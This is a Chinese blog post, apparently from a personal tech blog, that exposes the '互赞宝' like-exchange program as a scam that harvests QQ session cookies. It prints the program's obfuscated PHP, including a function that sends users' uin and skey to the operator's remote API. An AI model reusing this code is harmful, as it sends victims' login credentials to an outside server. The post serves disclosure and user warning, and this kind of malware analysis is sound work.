148天 倾丞

心随我意 路行千里

互赞宝真的是福利程序吗?(揭开互赞宝的骗子程序面纱)

发布于 6天前 / 138 次围观 / 4 条评论 / 技术分析 / 倾丞 / [百度已收录]

现在流行的互赞宝,与其说是互赞宝,不然直接说它是一款赤裸裸的骗子程序,会窃取使用者企鹅cookiecookie是客户端与服务器的一个会话机制,浏览器会储存一些网站的cookies以方便用户与网站再次登录时,及时便捷的栈道已经登录过的内容(也就是说只要企鹅cookie就相当于获得了你QQ的全部权限,他和你的QQ密码有异曲同工之妙),就好比是做地铁买的零时卡,有了这张卡就可以畅游地铁站了,至于用途,贩卖给社区,卡盟等商家,可以帮别人空间点赞,刷留言,刷评论等等......

我们这里以一个简单的html单页为例入手

可以看到扫码认证区域调用了js

可以看到调用了远程API,这也是导致记录cookie的根本原因

下面是七云大佬分析API的过程

首先本地搭建某款互赞宝程序(此时就已经可以看出一点东西了)

接下来分析一下源码

源代码贴下

function get_mpzs($AA_____A,$AA____A_,$AA____AA,$AA___A__,$AA___A_A=1)
{
    $EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{0x1}));
    unset($EfxtIL2);
    $EfxtIL2=$EfxF0;
    $A_AAAAA_=$EfxtIL2;
    unset($EfxV1);
    if(is_array($GLOBALS[AA___AA_]))goto EfxeWjgxtx;
    goto EfxldMhxtx;
    EfxeWjgxtx:$EfxV1=&$GLOBALS[AA___AA_][02];
    goto Efxxtw;
    EfxldMhxtx:$EfxV1=$GLOBALS[AA___AA_][02];
    Efxxtw:$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},&$EfxV1));
    $EfxL2=$EfxF0 . $AA_____A;
    $EfxF2=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{3}));
    $EfxL3=$EfxL2 . $EfxF2;$EfxL4=$EfxL3 . $AA____A_;unset($EfxV4);
    if(is_array($GLOBALS[AA___AA_]))goto EfxeWjgxtv;
    goto EfxldMhxtv;
    EfxeWjgxtv:$EfxV4=&$GLOBALS[AA___AA_][4];
    goto Efxxtu;
    EfxldMhxtv:$EfxV4=$GLOBALS[AA___AA_][4];
    Efxxtu:$EfxF3=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},&$EfxV4));
    $EfxL5=$EfxL4 . $EfxF3;$EfxL6=$EfxL5 . $AA___A__;
    $EfxF5=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{5}));
    $EfxL7=$EfxL6 . $EfxF5;
    $EfxL8=$EfxL7 . $AA___A_A;
    unset($EfxtIL9);
    $EfxtIL9=$EfxL8;
    $A_AAAAAA=$EfxtIL9;
    $EfxF0=call_user_func_array("get_curl",array(&$A_AAAAA_,&$A_AAAAAA));
    unset($EfxtIL2);
    $EfxtIL2=$EfxF0;
    $AA______=$EfxtIL2;
    if($AA______)goto EfxeWjgxuz;
    goto EfxldMhxuz;
    EfxeWjgxuz:return $AA______;
    goto Efxxty;
    EfxldMhxuz:$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{6}));
    return $EfxF0;Efxxty:
}
function get_mpzss($uin,$skey,$superkey,$uin2,$count){
    $url = "http://www.nb.huzanbao.cn:88/api.php?act=getmpz";
    $data = "uin=".$uin."&skey=".$skey."&qq=".$uin2."&count=".$count;
    $res = get_curl($url,$data);
    return $res;
}

所有用户的cookie会发送他们服务器,谨慎使用

参考文献https://blog.qqiyu.cn/545.html

解决方案

什么,你已经用了互赞宝了?大可不必担心,修改QQ密码后cookie就会重置,那边这里提供一个思路

扫码登录互赞宝→修改QQ密码→等待其他用户的点赞到账→白嫖 is OK

未显示?请点击刷新
  1. 2天前
    @
    标普500

    文章深刻,揭露现实

    • 2天前
      @ NO

      @标普500:然而还是有很多互赞宝用户每天无意间在被别人“利用”

  2. 5天前
    @

    文章非常好超喜欢

    • 5天前
      @ NO

      @热搜:感谢支持